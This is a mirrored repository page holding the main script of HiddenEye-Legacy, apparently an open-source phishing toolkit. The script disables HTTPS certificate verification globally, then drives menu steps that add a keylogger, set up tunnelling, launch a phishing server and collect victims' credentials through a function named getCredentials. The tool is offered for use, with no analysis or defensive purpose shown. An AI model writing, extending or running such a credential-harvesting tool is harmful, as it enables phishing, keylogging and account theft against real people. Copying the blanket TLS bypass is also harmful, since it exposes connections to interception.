mirror of
https://github.com/DarkSecDevelopers/HiddenEye-Legacy.git
synced 2024-03-22 21:12:55 +08:00
440ae30e58
i got its idea from https://grabify.link
51 lines
1.1 KiB
Python
51 lines
1.1 KiB
Python
#!/usr/bin/python3
|
|
#
|
|
#HiddenEye by Open Source Community
|
|
#
|
|
import multiprocessing
|
|
import gettext
|
|
from os import system,environ
|
|
import sys
|
|
import ssl
|
|
if(not environ.get('PYTHONHTTPSVERIFY',"") and getattr(ssl,'_create_unverified_context',None)):
|
|
ssl._create_default_https_context=ssl._create_unverified_context
|
|
|
|
from Defs.Checks import *
|
|
from Defs.Configurations import *
|
|
from Defs.Actions import *
|
|
from Defs.Languages import *
|
|
|
|
|
|
RED, WHITE, CYAN, GREEN, DEFAULT = '\033[91m', '\033[46m', '\033[36m', '\033[1;32m', '\033[0m'
|
|
checkPermissions()
|
|
installGetText()
|
|
languageSelector()
|
|
checkConnection()
|
|
checkNgrok()
|
|
ifSettingsNotExists()
|
|
readConfig()
|
|
|
|
|
|
if __name__ == "__main__":
|
|
try:
|
|
runMainMenu()
|
|
mainMenu()
|
|
|
|
keyloggerprompt()
|
|
addingkeylogger()
|
|
cloudfarePrompt()
|
|
addingCloudfare()
|
|
inputCustom()
|
|
port = selectPort()
|
|
|
|
##############
|
|
runServer(port)
|
|
selectServer(port)
|
|
|
|
multiprocessing.Process(target=runServer, args=(port,)).start()
|
|
getCredentials(port)
|
|
|
|
except KeyboardInterrupt:
|
|
endMessage()
|
|
exit(0)
|